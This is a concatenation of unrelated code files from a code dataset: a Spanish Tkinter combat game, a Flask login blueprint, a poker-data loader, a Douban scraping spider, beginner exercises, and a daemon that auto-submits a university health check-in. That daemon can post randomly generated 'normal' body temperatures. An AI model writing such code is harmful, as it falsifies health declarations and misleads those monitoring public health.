column=3,pady=5,padx=5,columnspan=2,rowspan=4)\t\n\n\tvaloracionguerreroenemigo=Label(frame_infoenemigo,text=\"{}\".format(suGuerrero.devuelve_valoracion()))\n\tvaloracionguerreroenemigo.config(font=(\"Arial Black\",22))\n\tvaloracionguerreroenemigo.grid(row=0,column=0,sticky=\"s\",columnspan=2)\n\t\n\n\tnombreguerreroenemigo=Label(frame_infoenemigo,text=\"{}\".format(suGuerrero.nombre))\n\tnombreguerreroenemigo.config(font=(\"Arial Black\",15))\n\tnombreguerreroenemigo.grid(row=1,column=0,sticky=\"s\",columnspan=2)\n\t\n\n\ttipoenemigo=Label(frame_infoenemigo,text=\"{} Lv:\".format(suGuerrero.tipo))\n\ttipoenemigo.grid(row=2,column=0,sticky=\"e\")\n\ttipoenemigo.config(font=(\"Arial\",9))\n\n\tnivelenemigo=Label(frame_infoenemigo,text=\" {}\".format(suGuerrero.nivel))\n\tnivelenemigo.config(font=(\"Arial Black\",12))\n\tnivelenemigo.grid(row=2,column=1,sticky=\"w\")\n\n\tatributosenemigo=Label(frame_infoenemigo,text=\"Atributos:\")\n\tatributosenemigo.config(font=(\"Arial\",11))\n\tatributosenemigo.grid(row=3,column=0,columnspan=2)\n\n\tinfoatributos1enemigo=Label(frame_infoenemigo,text=\"Ataque: {}\\n\\nDefensa: {}\".format(suGuerrero.ataque,suGuerrero.defensa))\n\tinfoatributos1enemigo.config(font=(\"Arial\",11))\n\tinfoatributos1enemigo.grid(row=4,column=0,rowspan=2,pady=2,padx=2)\n\n\tinfoatributos2enemigo=Label(frame_infoenemigo,text=\"{}/{} hp \\n\\n{}/{} mp\".format(suGuerrero.vida_actual,suGuerrero.vida,suGuerrero.mana_actual,suGuerrero.mana))\n\tinfoatributos2enemigo.grid(row=4,column=1,rowspan=2,pady=2,padx=2,sticky=\"w\")\n\tinfoatributos2enemigo.config(font=(\"Arial\",11))\n\n\tinforarezaenemigo=Label(frame_infoenemigo,text=\"{}\".format(suGuerrero.rareza))\n\tinforarezaenemigo.grid(row=6,column=0,columnspan=2,pady=2,padx=2)\n\tinforarezaenemigo.config(font=(\"Arial Black\",12))\n\n#---------------------------------Jugador--------------------------------\n\n\n\tfotoguerrerojugador=Label(frame_combate,image=foto_jugador)\n\tfotoguerrerojugador.grid(row=4, column=0,pady=5,padx=5,rowspan=4)\n\n\n\tframe_infojugador=Frame(frame_combate,width=300,height=300)\n\tframe_infojugador.config(bg=\"red\")\n\tframe_infojugador.grid(row=4, column=1,pady=5,padx=5,columnspan=2,rowspan=4)\t\n\n\tvaloracionguerrerojugador=Label(frame_infojugador,text=\"{}\".format(miGuerrero.devuelve_valoracion()))\n\tvaloracionguerrerojugador.config(font=(\"Arial Black\",22))\n\tvaloracionguerrerojugador.grid(row=0,column=0,sticky=\"s\",columnspan=2)\n\t\n\n\tnombreguerrerojugador=Label(frame_infojugador,text=\"{}\".format(miGuerrero.nombre))\n\tnombreguerrerojugador.config(font=(\"Arial Black\",15))\n\tnombreguerrerojugador.grid(row=1,column=0,sticky=\"s\",columnspan=2)\n\t\n\n\ttipojugador=Label(frame_infojugador,text=\"{} Lv:\".format(miGuerrero.tipo))\n\ttipojugador.grid(row=2,column=0,sticky=\"e\")\n\ttipojugador.config(font=(\"Arial\",9))\n\n\tniveljugador=Label(frame_infojugador,text=\" {}\".format(miGuerrero.nivel))\n\tniveljugador.config(font=(\"Arial Black\",12))\n\tniveljugador.grid(row=2,column=1,sticky=\"w\")\n\n\tatributosjugador=Label(frame_infojugador,text=\"Atributos:\")\n\tatributosjugador.config(font=(\"Arial\",11))\n\tatributosjugador.grid(row=3,column=0,columnspan=2)\n\n\tinfoatributos1jugador=Label(frame_infojugador,text=\"Ataque: {}\\n\\nDefensa: {}\".format(miGuerrero.ataque,miGuerrero.defensa))\n\tinfoatributos1jugador.config(font=(\"Arial\",11))\n\tinfoatributos1jugador.grid(row=4,column=0,rowspan=2,pady=2,padx=2)\n\n\tinfoatributos2jugador=Label(frame_infojugador,text=\"{}/{} hp 
\\n\\n{}/{} mp\".format(miGuerrero.vida_actual,miGuerrero.vida,miGuerrero.mana_actual,miGuerrero.mana))\n\tinfoatributos2jugador.grid(row=4,column=1,rowspan=2,pady=2,padx=2,sticky=\"w\")\n\tinfoatributos2jugador.config(font=(\"Arial\",11))\n\n\tinforarezajugador=Label(frame_infojugador,text=\"{}\".format(miGuerrero.rareza))\n\tinforarezajugador.grid(row=6,column=0,columnspan=2,pady=2,padx=2)\n\tinforarezajugador.config(font=(\"Arial Black\",12))\n\n#---------------------------------Display--------------------------------\n\n\tframe_display=Frame(frame_combate,width=300,height=500)\n\tframe_display.config(bg=\"red\")\n\tframe_display.grid(row=4, column=3,columnspan=3,rowspan=4)\n\n\tataque1=miGuerrero.lista_ataques[0]\n\tataque2=miGuerrero.lista_ataques[1]\n\tataque3=miGuerrero.lista_ataques[2]\n\tataque4=miGuerrero.lista_ataques[3]\n\n\t\n\n\tlaPantalla=Label(frame_display,textvariable=texto_pantalla)\n\tlaPantalla.grid(row=0,column=0,padx=2,columnspan=3)\n\n\tboton_avanzar=Button(frame_display,text=\"Avanzar\",command=lambda:avanzar_consola())\n\tboton_avanzar.grid(row=2,column=2,sticky=\"e\",pady=2,padx=2)\n\n\tboton_ataque1=Button(frame_display,text=\"{}\".format(ataque1[0]),width=15,command=lambda:ataque(ataque1))\n\tboton_ataque1.grid(row=3,column=0,padx=2)\n\n\tboton_ataque1etiqueta=Label(frame_display,text=\"{}\".format(ataque1[1]))\n\tboton_ataque1etiqueta.grid(row=3,padx=2,column=1)\n\n\tboton_ataque1valores=Label(frame_display,text=\"{} | {}\".format(ataque1[2],ataque1[3]))\n\tboton_ataque1valores.grid(row=3,padx=2,column=2)\n\n\tboton_ataque2=Button(frame_display,text=\"{}\".format(ataque2[0]),width=15,command=lambda:ataque(ataque2))\n\tboton_ataque2.grid(row=4,column=0,padx=2)\n\n\tboton_ataque2etiqueta=Label(frame_display,text=\"{}\".format(ataque2[1]))\n\tboton_ataque2etiqueta.grid(row=4,padx=2,column=1)\n\n\tboton_ataque2valores=Label(frame_display,text=\"{} | {}\".format(ataque2[2],ataque2[3]))\n\tboton_ataque2valores.grid(row=4,padx=2,column=2)\n\n\tboton_ataque3=Button(frame_display,text=\"{}\".format(ataque3[0]),width=15,command=lambda:ataque(ataque3))\n\tboton_ataque3.grid(row=5,column=0,padx=2)\n\n\tboton_ataque3etiqueta=Label(frame_display,text=\"{}\".format(ataque3[1]))\n\tboton_ataque3etiqueta.grid(row=5,padx=2,column=1)\n\n\tboton_ataque3valores=Label(frame_display,text=\"{} | {}\".format(ataque3[2],ataque3[3]))\n\tboton_ataque3valores.grid(row=5,padx=2,column=2)\n\n\tboton_ataque4=Button(frame_display,text=\"{}\".format(ataque4[0]),width=15,command=lambda:ataque(ataque4))\n\tboton_ataque4.grid(row=6,column=0,padx=2)\n\n\tboton_ataque4etiqueta=Label(frame_display,text=\"{}\".format(ataque4[1]))\n\tboton_ataque4etiqueta.grid(row=6,padx=2,column=1)\n\n\tboton_ataque4valores=Label(frame_display,text=\"{} | {}\".format(ataque4[2],ataque4[3]))\n\tboton_ataque4valores.grid(row=6,padx=2,column=2)\n\n\tobjetoslabel=Label(frame_display,text=\"Objetos:\")\n\tobjetoslabel.grid(row=7,column=0,pady=5,padx=2,sticky=\"e\")\n\n\tobjetosusar=Button(frame_display,text=\"Usar\",command=lambda:usar_objeto())\n\tobjetosusar.grid(row=7,column=2,pady=5,sticky=\"w\")\n\n\tobjetos=ttk.Combobox(frame_display,width=10,state=\"readonly\")\n\tobjetos.grid(row=7,column=1,pady=5)\n\tvalores=[]\n\tfor i in jugador.equipo_objetos:\n\t\tif i[4]==0:\n\t\t\tvalores.append(i[0])\n\n\t\tobjetos['values']=valores\n\n\tdef 
actualizarobjetos():\n\t\tobjetoslabel=Label(frame_display,text=\"Objetos:\")\n\t\tobjetoslabel.grid(row=7,column=0,pady=5,padx=2,sticky=\"e\")\n\n\t\tobjetosusar=Button(frame_display,text=\"Usar\",command=lambda:usar_objeto())\n\t\tobjetosusar.grid(row=7,column=2,pady=5,sticky=\"w\")\n\n\t\tlistadepociones=[]\n\t\tfor i in jugador.equipo_objetos:\n\t\t\tif i[4]==0:\n\t\t\t\tlistadepociones.append(i)\n\n\t\t\n\t\tif len(listadepociones)==0:\n\t\t\tobjetosusar.config(state=DISABLED)\n\t\telse:\n\t\t\tobjetosusar.config(state=NORMAL)\t\t\n\n\t\tobjetos=ttk.Combobox(frame_display,width=10,state=\"readonly\")\n\t\tobjetos.grid(row=7,column=1,pady=5)\n\t\tvalores=[]\n\t\tfor i in jugador.equipo_objetos:\n\t\t\tif i[4]==0:\n\t\t\t\tvalores.append(i[0])\n\n\t\tobjetos['values']=valores\t\n\t\t\n\t\n\n\tboton_descansar=Button(frame_display,text=\"Descansar\",width=20,command=lambda:descanso())\n\tboton_descansar.grid(row=8,column=1,padx=2,pady=2,columnspan=2)\n\n\tif comando_consola==0:\n\t\tcomando_consola+=1\n\t\ttexto_pantalla.set(\"Es tu turno, elige un ataque:\")\n\t\tboton_avanzar.config(state=DISABLED)\n\t\tif ataque1[3]>miGuerrero.mana_actual:\n\t\t\tboton_ataque1.config(state=DISABLED)\n\t\tif ataque2[3]>miGuerrero.mana_actual:\n\t\t\tboton_ataque2.config(state=DISABLED)\n\t\tif ataque3[3]>miGuerrero.mana_actual:\n\t\t\tboton_ataque3.config(state=DISABLED)\t\t\n\t\tif ataque4[3]>miGuerrero.mana_actual:\n\t\t\tboton_ataque4.config(state=DISABLED)\n\n\tdef test_finalizar_combate():\n\n\t\tif suGuerrero.vida_actual==0:\n\n\t\t\tif len(enemigo.equipo_guerreros)>0:\n\n\t\t\t\texp=suGuerrero.valor_exp\n\t\t\t\tpreguerrerito=enemigo.equipo_guerreros[0]\n\t\t\t\tpreguerrerito[0]=suGuerrero\n\t\t\t\tenemigo.equipo_guerreros[0]=preguerrerito\n\t\t\t\tenemigo.equipo_herido.append(enemigo.equipo_guerreros[0])\n\t\t\t\tenemigo.equipo_guerreros.pop(0)\n\t\t\t\tpreenemigo=enemigo.equipo_guerreros[0]\n\t\t\t\tguerrero1=preenemigo[0]\n\n\n\t\t\t\troot.destroy()\n\t\t\t\tcomando_consola=0\n\t\t\t\tframe_aumentar_exp(miGuerrero,exp)\n\t\t\t\n\t\t\t\n\n\n\tdef avanzar_consola():\n\t\ttest_finalizar_combate()\n\t\tglobal texto_pantalla\n\t\tglobal comando_consola\n\t\t\n\t\t\n\t\t\t\t#-------------------------------------\n\t\tif comando_consola!=3:\n\t\t\tcomando_consola+=1\n\t\telse:\n\t\t\tcomando_consola=1\t\n\n\t\tif comando_consola==1:\n\t\t\ttexto_pantalla.set(\"Es tu turno, elige un ataque:\")\n\n\t\t\tboton_ataque1.config(state=NORMAL)\n\t\t\tboton_ataque2.config(state=NORMAL)\n\t\t\tboton_ataque3.config(state=NORMAL)\n\t\t\tboton_ataque4.config(state=NORMAL)\n\t\t\tboton_descansar.config(state=NORMAL)\n\t\t\tboton_avanzar.config(state=DISABLED)\n\n\t\t\tif len(jugador.equipo_objetos)==0:\n\t\t\t\tobjetosusar.config(state=DISABLED)\t\n\n\t\t\tif ataque1[3]>miGuerrero.mana_actual:\n\t\t\t\tboton_ataque1.config(state=DISABLED)\n\t\t\tif ataque2[3]>miGuerrero.mana_actual:\n\t\t\t\tboton_ataque2.config(state=DISABLED)\n\t\t\tif ataque3[3]>miGuerrero.mana_actual:\n\t\t\t\tboton_ataque3.config(state=DISABLED)\t\t\n\t\t\tif ataque4[3]>miGuerrero.mana_actual:\n\t\t\t\tboton_ataque4.config(state=DISABLED)\n\t\t\t\t\n\n\t\telif comando_consola==2:\n\t\t\t\n\t\t\ttexto_pantalla.set(\"Es turno de {}\".format(suGuerrero.nombre))\n\n\t\t\tif 
len(jugador.equipo_objetos)!=0:\n\t\t\t\tobjetosusar.config(state=NORMAL)\n\t\t\t\tboton_ataque1.config(state=DISABLED)\n\t\t\t\tboton_ataque2.config(state=DISABLED)\n\t\t\t\tboton_ataque3.config(state=DISABLED)\n\t\t\t\tboton_ataque4.config(state=DISABLED)\n\t\t\t\tboton_descansar.config(state=DISABLED)\n\t\t\t\tboton_avanzar.config(state=NORMAL)\n\n\t\t\t\n\n\t\n\t\telif comando_consola==3:\n\t\t\t\n\t\t\tataque_aleatorio=random.choice(suGuerrero.lista_ataques)\n\t\t\tdanhoenemigo=suGuerrero.ataque+ataque_aleatorio[2]-miGuerrero.defensa*2\n\n\n\t\t\tif suGuerrero.mana_actual>ataque_aleatorio[3]:\n\t\t\t\tsuGuerrero.mana_actual-=ataque_aleatorio[3]\n\n\t\t\t\tif miGuerrero.vida_actual>=danhoenemigo:\n\n\t\t\t\t\tmiGuerrero.vida_actual-=danhoenemigo\n\t\t\t\telse:\n\t\t\t\t\t\n\t\t\t\t\tmiGuerrero.vida_actual=0\t\n\n\t\t\t\ttexto_pantalla.set(\"Ha utilizado {}\".format(ataque_aleatorio[0]))\n\t\t\telse:\n\t\t\t\tsuGuerrero.descansar()\n\t\t\t\ttexto_pantalla.set(\"Descansa para recuperarse\")\n\n\t\t\n\t\t\t\t#-------------------------------------\n\n\n\t\t\tactualizar_atributos()\n\n\t\t\n\t\t\n\n\tdef actualizar_atributos():\n\n\t\tinfoatributos2enemigo=Label(frame_infoenemigo,text=\"{}/{} hp \\n\\n{}/{} mp\".format(suGuerrero.vida_actual,suGuerrero.vida,suGuerrero.mana_actual,suGuerrero.mana))\n\t\tinfoatributos2enemigo.grid(row=4,column=1,rowspan=2,pady=2,padx=2,sticky=\"w\")\n\t\tinfoatributos2enemigo.config(font=(\"Arial\",11))\n\n\t\tinfoatributos2jugador=Label(frame_infojugador,text=\"{}/{} hp \\n\\n{}/{} mp\".format(miGuerrero.vida_actual,miGuerrero.vida,miGuerrero.mana_actual,miGuerrero.mana))\n\t\tinfoatributos2jugador.grid(row=4,column=1,rowspan=2,pady=2,padx=2,sticky=\"w\")\n\t\tinfoatributos2jugador.config(font=(\"Arial\",11))\t\n\n\t\tenemigoyvaloracion=enemigo.equipo_guerreros[0]\n\t\tenemigoyvaloracion[0]=suGuerrero\n\t\tenemigo.equipo_guerreros[0]=enemigoyvaloracion\t\n\n\t\tjugadoryvaloracion=jugador.equipo_guerreros[0]\n\t\tjugadoryvaloracion[0]=miGuerrero\n\t\tjugador.equipo_guerreros[0]=jugadoryvaloracion\t\t\t\t\n\n\n\n\tdef usar_objeto():\n\t\tactualizar_atributos()\n\t\tfor i in jugador.equipo_objetos:\n\t\t\tif i[0]==objetos.get():\n\t\t\t\tindice=jugador.equipo_objetos.index(i)\n\n\t\t\n\t\t\n\n\t\n\t\t\t\t\n\t\tjugador.usarobjeto(jugador.equipo_objetos[indice],miGuerrero)\t\t\n\t\tactualizar_atributos()\n\n\t\tavanzar_consola()\n\t\tactualizarobjetos()\n\n\tdef ataque(ataqueusado):\n\t\t\n\t\tdanhoataque=miGuerrero.ataque+ataqueusado[2]-round(suGuerrero.defensa*2)\n\n\n\t\tif danhoataque<=0:\n\t\t\tdanhoataque=1\n\t\telse:\n\t\t\tpass\t\n\n\t\tif danhoataque0:\n\t\t\t\tcombate(guerrero1,miGuerrero)\n\n\t\troot.mainloop()\t\t\n\n\t\n\n\ncombate(guerrero1,guerrero)\t\n\n\n\n\"\"\"info_enemigo=Label(frame_combate)\ninfo_enemigo.grid(row=0, column=1,columnspan=2)\ninfo_enemigo.config(bg=\"red\",width=300,height=500)\n\n\n\tinfo_nombreenemigo=Label(info_enemigo,text=\"{} Tipo: {}\".format(suGuerrero.nombre,suGuerrero.tipo))\n\tinfo_nombreenemigo.grid(row=0,column=0,columnspan=2)\n\tinfo_nombreenemigo=Label(info_enemigo,text=\"Rareza: {} Tipo: {}\".format(suGuerrero.nombre,suGuerrero.tipo))\n\tinfo_nombreenemigo.grid(row=1,column=0,columnspan=2,rowspan=2)\"\"\"\n\n\t#info_rarezaenemigo=Label(info_enemigo,text=\"Rareza: {} Nivel: 
{}\".format(suGuerrero.rareza,suGuerrero.nivel))\n\t#info_nombreenemigo.grid(row=1,column=0,rowspan=2,sticky=\"w\")\n\n\n\n\t\n\n\t\n\t\n\n\n\n\n","sub_path":"Videojuego1/Combate.py","file_name":"Combate.py","file_ext":"py","file_size_in_byte":19897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"521204025","text":"# encoding: utf-8\nfrom bs4 import BeautifulSoup\nimport requests\nimport time, configparser, os, random\nimport toolsPack\n\nlogger = toolsPack.logger\npushInfo = toolsPack.pushInfo\n\n# 初始化\ntry:\n with open('info.ini') as f:\n pass\nexcept FileNotFoundError:\n print(logger(1, '正在初始化'))\n cookie = toolsPack.cookiesHander()\n status = toolsPack.infoGen(cookie)\n if status:\n info = '初始化成功,请检查并完善 info.ini 文件,以便下次运行,详见 readme 文件'\n print(logger(1, info))\n else:\n info = '初始化失败'\n print(logger(-1, info))\n exit(0)\n\ndef check(cookie,data):\n response = requests.post('http://yun.ujs.edu.cn/xxhgl/yqsb/grmrsb',\\\n headers = toolsPack.headers, cookies=cookie, data=data)\n soup = BeautifulSoup(response.text, 'html.parser')\n try:\n msg = soup.find_all('h2')[1].string\n except IndexError:\n return {'err' : 1}\n return {'err' : 0, 'msg' : msg}\n\nwhile True:\n config = configparser.ConfigParser()\n config.optionxform = str\n config.read('conf.ini')\n\n # 打卡\n checkTime = int(config['global']['checkTime'])\n now = int(time.strftime('%H'))\n if now == checkTime:\n print(logger(1,'进入打卡流程'))\n while True:\n cookie = toolsPack.cookiesHander()\n loginStatus = toolsPack.getStatus(cookie)\n if loginStatus == -1:\n info = '服务器维护中,20分钟后重试'\n print(logger(-1,info))\n pushInfo(info, '')\n time.sleep(20*60)\n continue\n elif loginStatus == -2:\n info = 'cookie无��导致登陆失败,20分钟后重试'\n print(logger(-1, info))\n pushInfo(info, '')\n time.sleep(20*60)\n continue\n # 提交表单\n data = toolsPack.dataHander()\n # 体温接口\n if config['global']['temperatureSource'] == 'randomNomral':\n data['xwwd'] = round(random.uniform(36.3, 37.2),1)\n data['swwd'] = round(random.uniform(36.3, 37.2),1)\n elif config['global']['temperatureSource'] == 'manual':\n data['xwwd'] = config['tempData']['amTemp']\n data['swwd'] = config['tempData']['pmTemp']\n checkStatus = check(cookie, data)\n print(logger(2, 'POST DATA:' + str(data)))\n if checkStatus['err']:\n info = '收到服务器端不正确的回复,请检查,20分钟后重试'\n print(logger(-1, info))\n pushInfo(info, '')\n time.sleep(20*60)\n continue\n else:\n info = '打卡成功\\^o^/'\n print(logger(1, info + '返回消息: ' + checkStatus['msg']))\n pushInfo(info, '返回消息: ' + checkStatus['msg'])\n break\n time.sleep(60*60) # 好梦\n time.sleep(60*60)\n print(logger(1, '等待打卡'))\n ","sub_path":"checker-daemon.py","file_name":"checker-daemon.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"243185079","text":"#-------------------------------------------------------------------------------\n# Name: patron\n# Purpose: Controllers for the Patron Blueprint in the Catalog Pull Platform\n#\n# Author: Jeremy Nelson\n#\n# Created: 2014-02-12\n# Copyright: (c) Jeremy Nelson, Colorado College 2014\n# Licence: MIT\n#-------------------------------------------------------------------------------\n\nfrom flask import Blueprint, current_app, flash, g, session\nfrom flask import redirect, render_template, request, url_for\n\nfrom flask.ext.login import LoginManager, login_user, login_required\nfrom flask.ext.login import logout_user, current_user\nfrom flask.ext.mongokit import MongoKit\n\nfrom 
patron.forms import LoginForm, RegisterForm\nfrom patron.models import Patron\n\nlogin_manager = LoginManager()\npatron = Blueprint('patron', __name__, template_folder='templates')\n\n@login_manager.user_loader\ndef load_patron(patronid):\n return g.mongo_storage.Patron.get(patronid)\n\n@patron.route(\"/history\", methods=['GET', 'POST'])\n@login_required\ndef history():\n patron_ = g.mongo_storage.Patron.get(current_user.id)\n return render_template(\"history.html\", patron=patron_)\n\n@patron.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n patron_ = Patron.get(form)\n login_user(patron_)\n return redirect(request.args.get('next') or url_for('home'))\n return render_template(\"login.html\", form=form)\n\n@patron.route('/logout',\n methods=['GET', 'POST'])\ndef logout():\n logout_user()\n flash(\"Logged out\")\n return redirect(request.args.get('next') or url_for(\"home\"))\n\n@patron.route('/register',\n methods=['GET', 'POST'])\ndef register():\n form = RegisterForm()\n if request.method == 'POST':\n patron = g.mongo_storage.Patron()\n patron.givenName = request.form.get('givenName')\n patron.familyName = request.form.get('familyName')\n patron.email = request.form.get('email')\n patron.save()\n return redirect(request.args.get('next') or url_for(\"home\"))\n return render_template(\"register.html\", form=form)\n\n\n\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"360448502","text":"# walkable\ngeometry = 0\n\n# hero body and sensor\nhero = 1\n\n# instant death\ntrap = 2\n\n# zombies, bats, boss, etc\nenemy = 3\n\n# out of bounds sensors, instant kill. for falling off map\nboundary = 4\n\n# sword\nhero_sword = 5\n\n# stairs\nstairs = 6\n","sub_path":"castlebats/collisions.py","file_name":"collisions.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"622888371","text":"'''\n18. Faça um programa para uma loja de tintas. O programa deverá pedir o tamanho em\nmetros quadrados da área a ser pintada. Considere que a cobertura da tinta é de 1 litro\npara cada 3 metros quadrados e que a tinta é vendida em latas de 18 litros, que custam\nR$ 80,00. 
Informe ao usuário a quantidades de latas de tinta a serem compradas e o\npreço total.\n'''\nimport math\nprint(\"==============Loja do VOVO==============\")\nmetros = float(input(\"Digite a quantidade de metros quadrados a serem pintados: \"))\n\nlitros = metros/3\nvalor = 80\nlatas = math.ceil(litros/18)\n\ntotal = latas * valor\nprint(f'Vai precisar usar {latas} latas de 18 litros, vai cutar {total}')\n","sub_path":"Lista01/ex018.py","file_name":"ex018.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"55980529","text":"\n# 3.改写之前学生信息的程序:\n#   输入5个学生成绩\n#   1)按成绩从高至低打印学生信息\n# 2)按年龄从高至低打印学生信息\n# 3)按年龄从低至高打印学生信息\n#   4)按原来输入顺序打印学生信息(保持原列表不变)\ninfos = []\n\ndef input_student():\n while True:\n name = input(\"请输入学生姓名(直接回车结束)\")\n if len(name) == 0:\n break\n age = int(input('请输入年龄'))\n score = int(input('请输入成绩'))\n d = {'name':name, 'age':age, 'score':score}\n infos.append(d)\n return infos\n\n\n\ninput_student()\n#定义表格的各个列的宽度\nname_w = 15\nage_w = 10\nscore_w = 10\nhead1 = '+' + '-'*name_w + '+' + '-'*age_w + '+' + '-'*score_w + '+'\ndef print_all(fn):\n print()\n print(head1)\n head_text = '|' + '姓名'.center(name_w - 2) +\\\n '|' + '年龄'.center(age_w - 2)+ '|' + '成绩'.center(score_w - 2) + '|'\n print(head_text)\n return fn\n\n\n\n@ print_all\ndef print_a(i):\n fmt = '|%s|%s|%s|'\n name_text = i['name'].center(name_w)\n age_text = str(i['age']).center(age_w)\n score_text = str(i['score']).center(score_w)\n print(fmt % (name_text, age_text, score_text))\n\nfor i in infos:\n print_a(i)\nprint(head1)\n#输入学生分数线\n# print('按学生成绩从高至低打印')\n# def getscore():\n# return L['score']\n\n\n# s1 = sorted(infos, key=getscore,reverse=True)\n\n","sub_path":"aid1807a/练习题/python练习题/python基础习题/11/homework3.py","file_name":"homework3.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"472519185","text":"PERMISSION_TYPES = [\n 'permit',\n 'un_permit',\n 'add_owner',\n 'add_manager',\n 'add_new_product',\n 'add_existing_product',\n 'remove_product',\n 'remove_amount_of_product',\n 'add_hidden_discount',\n 'add_regular_discount',\n 'edit_regular_discount',\n 'edit_hidden_discount',\n 'edit_product',\n 'close_shop',\n 'reopen_shop',\n 'add_condition',\n 'add_sale',\n 'edit_product_condition'\n]\n# 'add_discount',\n","sub_path":"mysite/mysite/Shared_Classes/Consts.py","file_name":"Consts.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"215212026","text":"import pandas as pd\nimport tensorflow as tf\n\nTRAIN_URL = 'http://archive.ics.uci.edu/ml/machine-learning-databases/poker/poker-hand-training-true.data'\nTEST_URL = 'http://archive.ics.uci.edu/ml/machine-learning-databases/poker/poker-hand-testing.data'\n\nCSV_COLUMN_NAMES = [\n 'card_1_suit',\n 'card_1_rank',\n 'card_2_suit',\n 'card_2_rank',\n 'card_3_suit',\n 'card_3_rank',\n 'card_4_suit',\n 'card_4_rank',\n 'card_5_suit',\n 'card_5_rank',\n 'poker_hand'\n]\n\nPOKER_HANDS = [\n 'Nothing',\n 'One pair',\n 'Two pairs',\n 'Three of a kind',\n 'Straight',\n 'Flush',\n 'Full house',\n 'Four of a kind',\n 'Straight flush',\n 'Royal flush'\n]\n\ndef maybe_download():\n \"\"\"Use keras to download the datasets if they aren't already downloaded\"\"\"\n train_path = tf.keras.utils.get_file(TRAIN_URL.split('/')[-1], TRAIN_URL)\n test_path = 
tf.keras.utils.get_file(TEST_URL.split('/')[-1], TEST_URL)\n\n return train_path, test_path\n\ndef load_data(y_name='poker_hand'):\n \"\"\"Returns the poker hand dataset as (train_x, train_y), (test_x, test_y)\"\"\"\n train_path, test_path = maybe_download()\n\n # Load training data as a pandas DataFrame.\n # x refers to features and y refers to labels.\n train = pd.read_csv(train_path, names=CSV_COLUMN_NAMES, header=0)\n train_x, train_y = train, train.pop(y_name)\n\n # Load test data as a pandas DataFrame.\n test = pd.read_csv(test_path, names=CSV_COLUMN_NAMES, header=0)\n test_x, test_y = test, test.pop(y_name)\n\n return (train_x, train_y), (test_x, test_y)\n\ndef train_input_fn(features, labels, batch_size):\n \"\"\"Input function for training the network\"\"\"\n # Convert the inputs into a TensorFlow DataSet.\n dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))\n\n # Shuffle, repeat, and batch the examples.\n dataset = dataset.shuffle(1000).repeat().batch(batch_size)\n\n return dataset\n\ndef eval_input_fn(features, labels, batch_size):\n \"\"\"An input function for evaluation or prediction\"\"\"\n features = dict(features)\n if labels is None:\n # We are predicting, so only use features.\n inputs = features\n else:\n # We are evaluating, so use both.\n inputs = (features, labels)\n\n\n # Convert the inputs into a TensorFlow Dataset.\n dataset = tf.data.Dataset.from_tensor_slices(inputs)\n\n # Batch the examples\n dataset = dataset.batch(batch_size)\n\n return dataset","sub_path":"poker_data.py","file_name":"poker_data.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"548777721","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy_redis.spiders import RedisSpider\nfrom douban_slave.items import SlaveItem\nimport re\nclass SlaveSpider(RedisSpider):\n name = 'slave'\n #allowed_domains = ['douban.com']\n #start_urls = ['http://douban.com/']\n redis_key = 'doubanspider:start_urls'\n\n\n def __init__(self, *args, **kwargs):\n # 作用类似与scrapy的allowed_domains(限定爬虫爬取的url范围)\n # Dynamically define the allowed domains list.\n domain = kwargs.pop('domain', '')\n self.allowed_domains = filter(None, domain.split(','))\n super(SlaveSpider, self).__init__(*args, **kwargs)\n\n def parse(self, response):\n item = SlaveItem()\n item['id'] = response.url.split('/')[-2]\n item['title'] = response.css('a.nbg::attr(title)').extract_first()\n info = response.css('#info').extract_first()\n authors = re.findall('[\\s]*作者.*?(.*?)
', info, re.S) # 提取作者\n if authors:\n author_list = re.findall('<a.*?>[\s]*(.*?)[\s]*</a>', authors[0], re.S)\n if author_list:\n item['author'] = \"、\".join(author_list).replace('\n','').replace(' ','')\n else:\n item['author'] = \"\"\n else:\n item['author'] = \"\"\n #if re.search('<span class=\"pl\">作者</span>(.*?)<br/>',info,re.S):\n # author = re.search('<span class=\"pl\">作者</span>(.*?)<br/>',info,re.S).group(1)\n # item['author'] = '、'.join(re.findall('<a.*?>(.*?)</a>',author,re.S)).replace(' ','').replace('\n','')\n item['press'] = ''.join(re.findall('<span class=\"pl\">出版社:</span>(.*?)<br/>',info,re.S)).replace(' ','')\n item['original'] = ''.join(re.findall('<span class=\"pl\">原作名:</span>(.*?)<br/>',info,re.S)).replace(' ','')\n if re.search('<span class=\"pl\">译者</span>(.*?)<br/>',info,re.S):\n translator = re.search('<span class=\"pl\">译者</span>(.*?)<br/>',info,re.S).group(1)\n item['translator'] = '、'.join(re.findall('<a.*?>(.*?)</a>',translator,re.S)).replace(' ','').replace('\n','')\n item['imprint'] = ''.join(re.findall('出版年.*?(.*?)<br/>',info,re.S)).replace('年','-').replace('月','-').replace(' ','')\n item['pages'] = ''.join(re.findall('页数.*?(.*?)<br/>',info,re.S)).replace(' ','')\n item['price'] = ''.join(re.findall('定价.*?(.*?)<br/>',info,re.S)).replace(' ','')\n item['binding'] = ''.join(re.findall('装帧.*?(.*?)<br/>',info,re.S)).replace(' ','')\n item['series'] = ''.join(re.findall('<span class=\"pl\">丛书:</span>.*?<a.*?>(.*?)</a>',info,re.S))\n item['isbn'] = ''.join(re.findall('ISBN.*?(.*?)<br/>
